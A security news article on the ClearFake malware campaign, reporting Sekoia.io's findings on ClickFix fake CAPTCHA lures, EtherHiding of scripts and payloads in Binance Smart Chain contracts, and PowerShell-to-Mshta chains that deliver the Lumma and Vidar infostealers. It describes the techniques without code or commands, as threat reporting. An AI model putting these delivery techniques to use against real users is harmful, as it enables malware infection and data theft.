The latest version of the “ClearFake” malware family exploits Web3 capabilities to load malicious scripts, resources and payloads from smart contracts on the blockchain.
Sekoia.io explained in a blog post how the ClearFake malware leverages compromised websites, mainly WordPress sites, to spread infostealers using the social engineering technique known as ClickFix. The hijacked websites are made to display a fake error page along with instructions for the user to copy and paste a malicious PowerShell script into their Windows terminal.
The ClearFake campaign was first spotted in July 2023 and previously used fake web browser download pages to trick users into installing fake browser updates; the threat actors began using ClickFix around May 2024, according to Sekoia.io.
By July 2024, websites compromised by ClearFake had been visited by about 200,000 unique users, Sekoia.io reports.
EtherHiding method stores malicious files on the blockchain
In the latest iteration of the ClearFake campaign originating in December of 2024, the phishing lure has been updated to include fake CAPTCHA pages and the JavaScript framework. Additionally, threat actors have begun using the Binance Smart Chain to retrieve various files, including the ClickFix PowerShell payload.
The Binance Smart Chain is a blockchain platform with smart contract functionality; smart contracts are self-executing digital contracts designed to facilitate transactions on the blockchain.
In the case of ClearFake, the smart contracts are used as storage for resources used in the malware campaign, with these files being stored in the “Input Data” field of the contracts.
The initial JavaScript code that is executed when a user visits a ClearFake compromised website loads Application Binary Interfaces (ABIs) needed to interact with the smart contracts tied to the attackers Ethereum wallets.
ABIs define functions, objects and structures that dictate how an application should interact with a smart contract: in this case, the functions allow for the retrieval and execution of the necessary code from the smart contracts.
ClearFake loads additional JavaScript, ABIs, and the URL to the encrypted ClickFix lure HTML, as well as the AES key needed to decrypt it, from three different wallets throughout the attack chain. Some of the JavaScript code loaded collects the system, browser and cookie information from the user. The encrypted ClickFix HTML code is typically hosted on Cloudflare Pages, according to Sekoia.io.
This technique, known as EtherHiding, was previously used by ClearFake at a smaller scale. In October 2023, ClearFake was observed retrieving a single malicious JavaScript file from one of its Ethereum addresses.
EtherHiding not only aids threat actors in evading traditional detection methods but also ensures that the malicious files are permanently stored on the blockchain.
ClickFix social engineering leads to infostealer deployment
The fake CAPTCHA lures recently used by ClearFake imitate either a Cloudflare Turnstile page or a reCAPTCHA page.
The Cloudflare Turnstile imitation page displays the ClickFix prompt after two attempts to complete the verification process, claiming there is “unusual web traffic” requiring the user to execute the PowerShell commands copied to their clipboard.
The reCAPTCHA imitation displays a realistic prompt asking the user to select images containing a car, after which a “DNS error” message is displayed along with the ClickFix instructions.
The PowerShell commands lead to execution of Mshta.exe, which retrieves and runs JavaScript from a remote server that ultimately leads to the installation of Emmenhtal Loader and deployment of Lumma Stealer. ClearFake has also been observed spreading Vidar Stealer via a basic PowerShell loader since January 2025.
Using the wallet addresses involved in the campaign as indicators of compromise, Sekaoi.io analysts were able to scan for compromised websites on Censys and discovered more than 9,300 such sites as of February 24, 2025.
The Sekaoi.io researchers noted that the recent ClearFake developments, including the expanded EtherHiding method, were previously described by researcher Marek Szustak in a January 2025 blog post.
